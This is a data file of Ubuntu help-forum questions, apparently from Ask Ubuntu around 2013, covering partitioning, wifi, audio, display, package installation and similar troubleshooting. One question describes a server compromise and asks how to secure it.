377524	can i safely add a new partition ?	i 'm pretty sure that i only formatted a small portion of my hd when i installed saucy . i 'd like to create a new partition to store podcasts on ( having learned hte hard way the perils of a home partition that grows to infinity . but i 'm out of practice and i 'm not totally confident that i 'm not missing something . lsblk reports : amanda @ mona : ~ $ sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 238.5g 0 disk ├─sda1 8:1 0 487m 0 part /boot/efi ├─sda2 8:2 0 244m 0 part /boot └─sda3 8:3 0 237.8g 0 part ├─mona -- vg-root ( dm-0 ) 252:0 0 38.8g 0 lvm / └─mona -- vg-swap_1 ( dm-1 ) 252:1 0 7.8g 0 lvm └─cryptswap1 ( dm-2 ) 252:2 0 7.8g 0 crypt [ swap ] and fdisk reports : amanda @ mona : ~ $ sudo fdisk -l /dev/sda warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd3827d00 device boot start end blocks id system /dev/sda1 1 500118191 250059095+ ee gpt i should add that a friend helped me with the install and i specifically recall that we did n't partition it all up , but that he did the partitioning and made me a relatively small partition so i could do my own partitioning later .
377525	can not connct to network in any way	i am using windows 8.1 . i just installed ubuntu 13.10 on my laptop . it is connecting to any network . neither via the lan cable nor through the wifi . i cant even see the wifi . when i enable it through the keyboard button combination , it just does n't get enabled . also , when i try to connect through the lan cable , it still does n't work.. someone please help .
377526	usb audio input recording 3.3x too slow , playback 3.3x too fast , and garbled	i 'm developing a usb audio device that acts like a microphone . it produces an isochronous ( usb-talk for real-time ) audio stream at 8000 hz , 16-bit pcm . with ubuntu 13.10 the recording takes place about 3.3x too slow . that is , recording for 10 seconds produces a 3-second wav file , that plays back much too fast . ( best measurement of the ratio is 3.27 . ) the playback is worse than speeded up , it 's garbled too . for example counting `` one ... ..two ... ..three '' sounds like `` bzt..bzt..bzzt '' . i tried 3 different audio programs ( arecord , ocenaudio , audacity ) and two different computers . confoundedly , telling arecord to limit the recording to 10 seconds ( -- duration=10 ) actually takes about 33 seconds , and results in a 10-second wav file . it 's as if the driver is in a time warp . recording from the mic in a usb logitech headset produces a good file , with the correct speed and understandable audio . i know this sounds like a bad audio input usb device on my part , but recording from it works fine in windows ( via goldwave ) . my gut says there is a bug in the ubuntu audio driver when the isochronous data is coming in at only 8000 hz , which is unique . most microphones offer through the usb enumeration to sample for you at a variety of rates , e.g . 44100 , 22050 , 8000 , etc . for extraneous reasons i 'm confined to 8000 hz . anyone else see anything like a buggy audio usb driver ? any ideas how to gain evidence incriminating or exonerating ubuntu drivers ?
377532	confusion with printf command ?	i have to print the following three lines in one print command without using echo command . so i have chosen printf command.here are the three lines : different characters can be represented and supported in the print command , for example : x-y , x+y , â , + , < , > , % , $ , # , & . what i have done so far is : printf `` different characters can be represented and supported in the print command , for example : x-y , x+y , â , + , < , > , % , $ , # , & . `` but i got bash error for the third line ' , ' . so will anyone enlighten me up .
377535	add packages to ubuntu distro installation	i wan na create small change to ubuntu install cd . i want to add a few packages so when ubuntu is installing , those packages also would be installed . so i wondering if it has some maybe post-installation script ? all this just for personal use . i need to install same software on about 30 computer and i want to automate this process as possible . thanks
377539	how do i get my audio player to talk to gpodder ?	i just moved to 13.10 ( and a new computer ) and i 'm totally flummoxed by my audio player ( sansa fuze ) . i want it to talk to gpodder , but it is mounting to location mtp : // [ usb:003,004 ] / and i can find it in /run/user/1000/gvfs/mtp\ : host\= % 5busb % 3a003 % 2c002 % 5 but it never mounts the same twice . so how do i tell gpodder where to find it ?
377542	terminal opens up in ~/documents	why does terminal open up in documents ? for example , i opened the terminal and it says : cyberproxy @ paradox : ~/documents . why is that the default location ? ca n't do anything that way . my ~/.bashrc file is : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi
377543	can not boot 13.10 on 2013 mac mini	since the update to os x mavericks seems to have corrupted my grub on my linux partition , i now would like to boot into a livecd and restore grub again . sadly using the 13.10 mac desktop iso , i get a usb stick , which gets correctly found by the mac ( as `` windows '' ) , but when trying to boot i only get boot error the same is true for a 13.04 mac iso . has anyone successfully booted this livecd on a recent mac ( mini ) ?
377544	i can not set a custom resolution on ubuntu 12.04 lts , help ?	i have been trying ( to no avail ) to set a custom resolution in ubuntu 12.04 for hours now and it 's just not working . i 've already tried using things like xrandr and xorg.conf but i 'm at wit 's end here . when i get to the stage where i add my new display mode ( using xrandr ) i receive the following error : xrandr -- addmode hdmi-0 `` 1824x1024_60.00 '' x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 35 current serial number in output stream : 36 i should add that when i go to input the resolution i want to display using : cvt 1820 1024 60 i 'll get this as a response : # 1824x1024 59.86 hz ( cvt ) hsync : 63.63 khz ; pclk : 154.75 mhz modeline `` 1824x1024_60.00 '' 154.75 1824 1936 2128 2432 1024 1027 1037 1063 -hsync +vsync note how it changes 1820x1024 , to 1824x1024 . why is that ? i 'll appreciate any feedback or help that you 're willing to offer , thanks . edit : i want to add a step that i had n't originally , when i enter : xrandr -- newmode `` 1824x1024_60.00 '' 154.75 1824 1936 2128 2432 1024 1027 1037 1063 -hsync +vsync i do not get any response or error report , only the usual `` username @ computername : ~ $ '' , is this what should happen ?
377546	ubuntu server participating in ddos attacks	we have an ubuntu-11.04 server running postfix which seems to be participating in an attack on other computers . the following processes were observed on the server : www-data 6465 28192 0 08:52 ? 00:00:00 /bin/bash ./su 62.150 www-data 6469 6465 0 08:52 ? 00:00:00 sleep 10 www-data 19614 1 63 nov14 ? 08:48:26 klogd -x www-data 28191 1 0 nov13 ? 00:00:00 sh -c ./rand 2 > & 1 3 > & 1 www-data 28192 28191 0 nov13 ? 00:00:17 /bin/bash ./rand www-data 31401 1 0 nov12 ? 00:00:00 sh -c ./rand 2 > & 1 3 > & 1 www-data 31402 31401 20 nov12 ? 14:45:44 /bin/bash ./rand also , the following entries were in the /var/log/auth.log nov 10 13:46:06 smtp2 su [ 21335 ] : pam_unix ( su : auth ) : authentication failure ; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=root nov 10 13:46:07 smtp2 su [ 21335 ] : pam_authenticate : authentication failure nov 10 13:46:07 smtp2 su [ 21335 ] : failed su for root by www-data nov 10 13:46:07 smtp2 su [ 21335 ] : - /dev/pts/0 www-data : root nov 10 13:46:08 smtp2 su [ 21336 ] : pam_unix ( su : auth ) : authentication failure ; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=root nov 10 13:46:10 smtp2 su [ 21336 ] : pam_authenticate : authentication failure nov 10 13:46:10 smtp2 su [ 21336 ] : failed su for root by www-data nov 10 13:46:10 smtp2 su [ 21336 ] : - /dev/pts/0 www-data : root nov 10 13:46:10 smtp2 su [ 21337 ] : pam_unix ( su : auth ) : authentication failure ; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=root nov 10 13:46:13 smtp2 su [ 21337 ] : pam_authenticate : authentication failure nov 10 13:46:13 smtp2 su [ 21337 ] : failed su for root by www-data nov 10 13:46:13 smtp2 su [ 21337 ] : - /dev/pts/0 www-data : root nov 10 13:46:13 smtp2 su [ 21338 ] : pam_unix ( su : auth ) : authentication failure ; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=root nov 10 13:46:14 smtp2 su [ 21338 ] : pam_authenticate : authentication failure nov 10 13:46:14 smtp2 su [ 21338 ] : failed su for root by www-data doing a find on the system for files named rand reveals the following : find . -name rand -print ./tmp/rup/rand /tmp has the following : drwxr-xr-x 2 www-data www-data 4096 2013-11-15 10:24 rup -rw-r -- r -- 1 www-data www-data 1080938 2013-11-13 13:51 rup.tgz is this normal ? it seems the server has been infected at some point even though the only open ports are pop3 and smtp . can the server get infected using these ports ? if yes , what can be done to secure the server from further infections ?
377553	remove gnome from ubuntu gnome after switching to cinnamon	i installed cinnamon on top of gnome in ubuntu gnome 13.10 . i would like to remove the unnecessary parts of gnome , primarily the settings which show as duplicates with the cinnamon ones , making it hard to distinguish which is which . i tried removing gnome-shell , but it caused the computer not to boot to the login screen . even if i must keep some parts installed , how can i remove the unnecessary components of gnome ?
377556	change backup target directory	how do i change target directory for simple backup ? i have tried to point to a standalone hard drive , but i continually get error saying there is not enough space on the ubuntu one default directory . i have been trying to correct this for about 6 months .
377559	where did nautilus 's panes go ?	i used to be able to open a second nautilus pane/panel with f3 , but that does n't seem to work in 13.10 and i do n't see anything about panes in prefs or menus . where 'd it go ?
377562	problem when trying to run a compiled c++ file ( uses opengl ) . error : `` inconsistency detected by ld.so : dl-version.c : 224 ''	i created a simple opengl file in cpp . it works on the university computer . i 'm able to compile the file , but i can not run the compiled file . the error i get is : inconsistency detected by ld.so : dl-version.c : 224 : _dl_check_map_versions : assertion `needed ! = ( ( void * ) 0 ) ' failed ! the file code is : // // model.cpp // cg-projects // // created by huji computer graphics course staff , 2013 . // # include `` shaderio.h '' # include `` model.h '' # include < gl/glew.h > # ifdef __apple__ # include < opengl/opengl.h > # else # include < gl/gl.h > # endif # include < glm/glm.hpp > # include < glm/gtc/type_ptr.hpp > # include `` glm/gtc/matrix_transform.hpp '' # define shaders_dir `` shaders/ '' model : :model ( ) : _vao ( 0 ) , _vbo ( 0 ) { } model : :~model ( ) { if ( _vao ! = 0 ) gldeletevertexarrays ( 1 , & _vao ) ; if ( _vbo ! = 0 ) gldeletebuffers ( 1 , & _vbo ) ; } void model : :init ( ) { programmanager : :sharedinstance ( ) .createprogram ( `` default '' , shaders_dir `` simpleshader.vert '' , shaders_dir `` simpleshader.frag '' ) ; gluint program = programmanager : :sharedinstance ( ) .programwithid ( `` default '' ) ; // obtain uniform variable handles : _fillcoloruv = glgetuniformlocation ( program , `` fillcolor '' ) ; // initialize vertices buffer and transfer it to opengl { // for this example we create a single triangle : const float vertices [ ] = { 0.75f , 0.75f , 0.0f , 1.0f , 0.75f , -0.75f , 0.0f , 1.0f , -0.75f , -0.75f , 0.0f , 1.0f , } ; // create and bind the object 's vertex array object : glgenvertexarrays ( 1 , & _vao ) ; glbindvertexarray ( _vao ) ; // create and load vertex data into a vertex buffer object : glgenbuffers ( 1 , & _vbo ) ; glbindbuffer ( gl_array_buffer , _vbo ) ; glbufferdata ( gl_array_buffer , sizeof ( vertices ) , vertices , gl_static_draw ) ; // tells opengl that there is vertex data in this buffer object and what form that vertex data takes : // obtain attribute handles : _posattrib = glgetattriblocation ( program , `` position '' ) ; glenablevertexattribarray ( _posattrib ) ; glvertexattribpointer ( _posattrib , // attribute handle 4 , // number of scalars per vertex gl_float , // scalar type gl_false , 0 , 0 ) ; // unbind vertex array : glbindvertexarray ( 0 ) ; } } void model : :draw ( ) { // set the program to be used in subsequent lines : gluint program = programmanager : :sharedinstance ( ) .programwithid ( `` default '' ) ; gluseprogram ( program ) ; glenum polygonmode = gl_line ; // also try using gl_fill and gl_point glpolygonmode ( gl_front_and_back , polygonmode ) ; // set uniform variable with rgb values : float red = 0.3f ; float green = 0.5f ; float blue = 0.7f ; gluniform4f ( _fillcoloruv , red , green , blue , 1.0 ) ; // draw using the state stored in the vertex array object : glbindvertexarray ( _vao ) ; size_t numberofvertices = 3 ; gldrawarrays ( gl_triangles , 0 , numberofvertices ) ; // unbind the vertex array object glbindvertexarray ( 0 ) ; // cleanup , not strictly necessary gluseprogram ( 0 ) ; } void model : :resize ( int width , int height ) { _width = width ; _height = height ; _offsetx = 0 ; _offsety = 0 ; } i 'm using ubuntu 13.10 thanks = ]
377569	numix theme removal : resulting mixed themes	i tried installing numix using the command : sudo apt-get install numix-gtk-theme numix-icon-theme numix-wallpaper-saucy but i didnt like it . so i tried removing it using sudo apt-get remove numix-gtk-theme numix-icon-theme numix-wallpaper-saucy now i have a mixed theme of sorts . the drives are not showing up in the left dash panel . the wifi icons are all discoulored . can someone suggest a way to restore all to the original 13.10 themes ?
377572	installing tl-wn723n v3 in ubuntu	i followd a guide for install tl-wn723n v3 driver in ubuntu 12.04 . however , the system gave the following reply when i typed make : make arch=armv7l cross_compile= -c /lib/modules/3.4.29+/build m=/home/ubuntu/desktop/rtl8188eu-master modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.4.29+' makefile:567 : /usr/src/linux-headers-3.4.29+/arch/armv7l/makefile : no such file or directory make [ 1 ] : *** no rule to make target `/usr/src/linux-headers-3.4.29+/arch/armv7l/makefile ' . stop . make [ 1 ] : leaving directory `/usr/src/linux-headers-3.4.29+' make : *** [ modules ] error 2 with uname -m i got armv7l , but armv7l does n't exist in the folder /usr/src/linux-headers-3.4.29+/arch/ how can i resolve this ?
377574	nautilus gives me an error when i try to eject my fuze	when i try to eject my sansa fuze from nautilus ( by clicking the `` eject '' icon ) i get this : oops ! something went wrong . unhandled error message : no such interface 'org.gtk.vfs.mount ' on object at path /org/gtk/vfs/mount/1 and it doens't unmount . just to be extra weird , the `` eject '' icon does disappear , but as soon as i select the sansa fuze device , it comes right back . sudo umount gvsfd-fuse does n't return an error or do anythiit 's mounting at mtp : // [ usb : it 's mounting atmtp : // [ usb:003,004 ] /which i 'm new to . how do i safely remove ing . 003,004 ] / which i 'm new to . how do i safely remove it ?
377576	managing ipod in ubuntu 12.04 , using rhythmbox	when i try to use rhythmbox to add or remove songs from my ipod which is : lsusb : bus 002 device 006 : id 05ac:1265 apple , inc. ipod nano 5.gen i get : error opening file '/media/029f4818-0a60-3482-bf31-75e440cd38e0/ipod_control/music/f13/song ~fu.mp3 ' : read-only file system i set it to manually manage music on the another pc with itunes , and i restored it before that . i 've tried things like songbird and gtkpod in the past but they did n't work on other versions of ubuntu . is it true that apple makes it so that you ca n't use ipods on non-mac or non-windows machines ?
377578	older system , latest version of flash player does n't work	i am running ubuntu 12.04.3 on a 32bit system with 2.0gb of ram , amd athlon xp 2000+ cpu and a geforce 2600 video card . i ca n't get the current version of flash player to work . i know there is a fix for older systems , but ca n't figure it out . any ideas ?
377579	ffmpeg output screenshot gallery	does any one knows if ffmpeg can create video thumbnails something like i know totem can do this but totem does not support the video format that i am using thank you in advanced you can see this article as well
377583	is there a spell checker for everpad ?	everpad works best for me except for one : spell check support . is there anyway i could use a generic spell checker to work with everpad ?
377588	microphone jack not working on toshiba satelite c55	i am using a toshiba c55 pc . i am having ubuntu 13.10 on it . when i plug my guitar normally into the microphone input , screeching sound comes . how can i fix this issue ? does it needs a driver ?
377589	hosting server on ubuntu via steamcmd	i am trying to host a gmod server on linux/ubuntu . and i found a website . http : //maurits.tv/data/garrysmod/wiki/wiki.garrysmod.com/indexfd7a.html and when i get to the quick installer and i try to run the command : ./installgmod.sh i get this forever : connecting content server session for version 164 retrying in 30 seconds ... now this is not just on ubuntu . i get this when i try to run it on windows as well , but i need a solution for ubuntu . what is going wrong here ? how can i fix this problem ? any other way to host a gmod server on linux ? i also tried this which did n't work either : http : //wiki.garrysmod.com/page/linux_dedicated_server_hosting
377590	setxkbmap resets in ubuntu 13.10	changes using setxkbmap reset after a minute or two in ubuntu 13.10 . i 've been using setxkbmap to modify my keyboard settings for years using ubuntu , and after the upgrade to 13.10 , the changes do n't hold for longer than a few minutes . this is not a duplicate . i 'm asking specifically why changes made using setxkbmap are reset after a minute or two in ubuntu 13.10 . i 'm not asking how to switch keys using other programs like xmodmap , xbindkeys , etc .
377591	13.10 firewall issue	i 'm running kubuntu 13.10 on my netbook , which is mostly used just running around jacked into wifi hotspots . i recently set up the firewall with ufw using the steps in this : http : //ubuntuforums.org/showthread.php ? t=1876124 & highlight=firewall+tutorial i did the same steps in 12.04 , in which they worked perfectly . in 13.1o , they do not . there is one hotspot i use that does n't use a password at the router level but you have to go through an authentication login page . it will bring up this page but wo n't connect . if i disable ufw in terminal it then connects normally . i tried resetting to ufw defaults and retyping the settings . no luck . i did n't add the enable 6667:7000 rule because apparently that 's for irc and it seemed to be included just as a syntax example anyway . i tried to see what was different in 13.10 and found that samba is n't installed by default anymore . so i installed it and did sudo ufw enable samba . no luck there either . i have no idea how to see what port that authentication page is trying to access or how to enablle that . please do not suggest using iptables . i do not have that level of commitment . i 'd rather use windows . or just not use a firewall , which is not something i want to do . for a supposedly casual , non tech distro this is just absurd .
377592	using both an ati firegl v3350 and radeon 7950 at the same time	i just got a radeon 7950 video card and installed ubuntu right after i got it . i already had an ati firegl v3350 . i got the 7950 working by installing these packages : fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev . but now i ca n't get the v3350 to work with x . if i physically remove the 7950 , aticonfig tells me that there are no supported cards . how can i get both cards working at the some time ? here 's the output from lspci : 40:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv515 gl [ firegl v3350 ] 40:00.1 display controller : advanced micro devices , inc. [ amd/ati ] rv515 gl [ firegl v3350 ] ( secondary ) 60:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] tahiti pro [ radeon hd 7950 ] 60:00.1 audio device : advanced micro devices , inc. [ amd/ati ] tahiti xt hdmi audio [ radeon hd 7970 series ]
377594	sweet home 3d does n't work after changing the language	i installed sweet home 3d and it worked fine . but then i tried to change the language to dutch . this did n't work and since then i ca n't use sweet home 3d anymore . i tried to remove the program and install it again , but it keeps on having the same problem . i think ubuntu rememberes the previous installation and always goes back to my latest change with the language . how can i remove the previous install completely and get started from the beginning ?
377596	how to check the integrity of downloaded big mkv files	just downloaded a big mkv file which is more than 20gb . it took me several days to finish the downloading . but , how to check whether the download has been completed , or it was just aborted halfway ? i have this question , because for a mkv file , mplayer can still play it until the point it is broken . any utility in ubuntu for such kind of checks ?
377599	update garmin n端vi 255 maps	is there a way to update the gps ' ( garmin n端vi 255 ) maps with ubuntu ? i 'm hoping for a free ( as in does n't cost anything ... i already bought the darn thing ) solution . i have installed the plugin , and it works with mygarmin , however i can not register my device because i need to install whatever windows software ( garmin express ) it requires , and all i can find is `` purchasing maps update '' ... this is my first gps and i just want to get the most recent maps as my local streets do n't show up .
377600	printer/scanner install	i have an hp psc 2175 all in one printer , scanner and copier . when i tried to install it on my computer with my new ubuntu os all that installed was the printer . all i did was plug in the cable from the printer/scanner and the pinter was intalled but not the scanner . do you have any idea why this is or any suggestions how to fix it .
377601	how do you boot ubuntu server to ram ?	i have installed ubuntu 12.04 server on a usb drive , which is the hard drive for this pc . how do i get the bootloader to load ubuntu onto ram ? essentially , this is going to resemble a live-cd type of environment , where the os is on the cd/usb/hdd ( whatever it may be ) , and gets loaded into ram . how do i do this with ubuntu server ?
377602	the top panel bar in unity will not change the icon theme	i had to reinstall unity and now for some reason the icon theme is stuck for only the icons in the top menu bar panel . is there a cache that might have got corrupt ? maybe there is a place to manually change this ?
377606	ubuntu 12.04 and 13.10 do not connect to wifi , but kubuntu does connect	no distro i have tried ( ubuntu 12.04 and 13.10 , latest mint , gentoo and suse ) connects to wifi . but kubuntu does . the signal is weak but all pick it up , i am than asked to enter the password and the connecting process starts , only to finish after some seconds and ask again for the password . it is the same in all distros . when i am not at home , using another network , all distros worked fine . so i assume it ca n't be a hardware issue . what can i do to get back to having wifi on ubuntu ? the version of kubuntu is this one , which leaves me clueless as to why ubuntu 12.04 is not connecting , lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise
377610	kmymoney and liability handling	am testing financial applications and i 'm currently trying out kmymoney on unity 13.04 . i need a package to use in our company ( small 1-10 employees ) to track all our expenses . i want to record all money we take from loan as single account ( liability kind of ) . since that account will manage all of single kind of loans ( say all individuals that are not coming from companies ) i do not want kmm to track time , just like credit card does so i can not use the loan account ( these are not actually loans in strict sense of the word ) . so do kmymoney support that ? if no do gnucash support that ? if am not clear please point it out so that i make myself clear . and if i offend any accounting guy , am an engineer so bear with my terminologies please . i use kmymoney 4.6.3 that comes from ubuntu repositories .
377612	disable touchpad when using mouse	i want to automatically disable my touchpad when i use a mouse . i have tried touchpad indicator which did n't work ( error message , could n't install ) and configuration using synaptics driver but it 's too complicated for me : ( any ideas ? another thing , if i do n't use a mouse i would like to configure the touchpad settings , because `` disable touchpad while typing '' does n't help and it is really impossible to type right now . is there any easy way to change the settings for the touchpad ? thank you !
377616	blank terminal ?	i can open terminal with ctrl-alt-t , but , it 's completely blank and no way to input anything ? i tried typing just in case there was something hidden but it 's as though the font is black on black . i 've tried changing font colours but it did n't do anything i have ubuntu 12.04 lts installed how do i get to see what i 'm doing ( or what did i do to screw up ? ) thanks in advance pj
377620	flash player still not working , mozilla , pogo games !	i have flash player installed but still not working , i am on mozilla trying to play pogo games ! how can i get the flash player to work on mozilla to play on pogo ? ! help !
377621	got everpad installed and working - alas can not search in dash	i got everpad installed and syncing , however everpad lens does appear in the dash . therefore i am unable to search my note . using ubuntu 13.10 and everpad ( version : 2.5 api version : 6 schema version : 5 )
377628	ubuntu wont recognize my hard drive	i go to install ubuntu and i get to where it asks where i want to install it and it wont give me any options . if i hit the + or - signs , change , or go back it just freezes on me . i have a 500gb western digital hhd . ive tried adding a partionion and just leaving it all the way windows made it . i have a custom made computer that i built and installed windows 8 on and have since upgraded to 8.1 . help ?
377632	count number of lines the begin with date and timestamp	how can i count the number of lines that begin with the date and time stamp that matches one hour or less from now ? the file in this location /home/liamcomfort/my.log . an example of the log 's format is : nov 10 04:03:00 friendly . wholesale sweaters , no problems , sometimes overnight , inexpensive than large element . nov 10 04:03:07 now want to grab the spotlight form the official website . nov 10 04:04:01 no matter who , overall planning , implementation than electric . i will be traveling to japan tomorrow , at best . nov 10 04:04:01 get 's not , the element of which that can be used , unless the slough , the bow to the policies , comprehensive package
377640	proper maas configuration	working with ubuntu server 12.04 maas installation , and i am having trouble making sense of the official documentation : docs i might be missing something , but i ca n't find any documentation on what the networking configuration should be . i would assume that there needs to be two network interfaces on the controller , one connected to the rest of the network/internet ( public ) , and one for the nodes ( private ) . when installing , you select a primary interface , which becomes eth0 after installation in : /etc/network/interfaces i selected my public interface as the primary during install . now i guess i need to set up the private interface , eth1 , by hand ? in the docs : cluster configuration there is some additional interface , lxcbr0 . are there missing steps in the documentation ? please let me know if i need to clarify this . would love to contribute to the docs if i can get this working . this is my layout : edit : i am able to register nodes with this setup , but i am still unable to commission nodes . this may have to do with the fact that the nodes behind the maas-dhcp server do not have access to the internet
377641	how can i add more disk space to /boot for update	i have ubuntu 13.04 and when trying to update , it tells me there is not enough disk space . i have plenty of hard drive space so i just need to increase space on the partition that is allowed for ubuntu to use for operating system and updates . the error message reads '' the upgrade needs a total of 26.7 m free space on disk '/boot ' . please free at least an additional 10.5 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean '' i have done sudo apt-get clean and still not enough space . i have tried sudo apt-get autoclean then sudo apt-get update & sudo apt-get upgrade
377642	error installing emacs 24 on ubuntu 12.04	i am trying to install emacs 24 on ubuntu 12.04 from the ppa as follows sudo add-apt-repository ppa : cassou/emacs sudo apt-get update sudo apt-get install emacs24 emacs24-el emacs24-common-non-dfsg my system is already running emacs 23.3.1 from the default repositories . the install runs normally before erroring out with the following message . install/ilisp : handling install for emacsen flavor emacs24 emacs-install : /usr/lib/emacsen-common/packages/install/ilisp emacs24 emacs23 failed at /usr/lib/emacsen-common/emacs-install line 28 , < tsort > line 20. dpkg : error processing emacs24 ( -- configure ) : subprocess installed post-installation script returned error exit status 255 errors were encountered while processing : emacs24 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i came across this thread which also discusses a broken emacs 24 installation but their problem was of missing files , which mine does not seem to be . i have also made sure that the dependencies are there by running sudo apt-get install build-essential sudo apt-get build-dep emacs this thread from last year about 11.10 recommends removing all of emacs first but that sounds pretty extreme , and as one commenter there pointed out , purging emacs from 12.04 may remove some ubuntu components as well . i am hoping there are some better solutions out there by now .
377644	my android device will not show up on my ubuntu pc	when i hooked my android phone up to my pc with windows 7 , i could co in to `` computer '' and find my device . how do i find my device on ubuntu 12.04 , so i can import my pictures and music ?
377647	ubuntu 13.10 no sound output	after upgrading to ubuntu 13.10 from 13.04 i have no sound output devices listed on the sound settings and therefor no sound.. i have tried running sudo alsa force-reload and restarting but neither helped . this is how my sound settings looks like :
377648	share wifi for google nexus	how i can share wifi from my laptop for using it on google nexus 7 ? i try do it with wep-40/128 and with wep-128 , it 's work for my another laptop but not for nexus .
377650	driver for canon scanner 8400f	i am looking for driver canoscan series 8000 more specific 8400f . can a driver for osx be used in ubuntu . the scanner is in the usb list but can not be used . scanning programs gives the message no scanner found .
377653	how can i get ubuntu save my wifi password ?	each time i start lightdm , ubuntu pops up a box asking me for my wifi password before i log in - i can log in without the password . how i can have ubuntu save the password and connect the wifi automatically at boot ?
377657	xubuntu 13.10 : wifi hard blocked on lenovo t520	i have xubuntu 13.10 running on a lenovo t520 laptop . everything worked just fine , but today , when i was in the middle of a skype call , my laptop just disconnected from wi-fi . and now it says wi-fi is disabled by hardware switch in the networking menu . i tried rfkill unblock all , but with no effect : rfkill list all still says : phy0 : wireless lan soft blocked : no hard blocked : yes the wi-fi switch hotkey ( fn+f5 ) does n't have any effect as well . also i tried pressing fn+f5 while booting the system but with no effect . i noticed that the wi-fi indicator led below the screen is now always off , even on system reboot . can this mean that my wi-fi controller is damaged ?
377662	how to build ubuntu applications using java ?	actually i have done core java 3 years ago , and after that jsp ( java server pages ) , springs , hibernate .what i need is to know is how can i make ubuntu based application using java , as this is the only language i knew and where am proficient at.i think as of now my knowledge is enough for making apps and contribute in a way i can . like which sdk i need , and what others tools for building apps in java ? i have already searched a lot but couldnât find any useful information.all i got is ubuntu sdk for making ubuntu mobile phone app by using either qml or html5 . that is just not what i want for now . any answer and useful links would be appreciated.thanks in advance .
377667	my keyboard is coming up with strange options	a few days ago , before i switched from 13.04 to 13.10 , my keyboard started coming up with options ctrl : swapcaps and japan : nicola_f_bs . not realizing at the time that setxkbmap -option would temporarily fix the problem , i bought another keyboard which worked the same . file /etc/defaults/keyboard shows the right settings but it is dated from the day i installed 13.10 . so it is not the source of the problem . how can i find and fix the source of these odd options ?
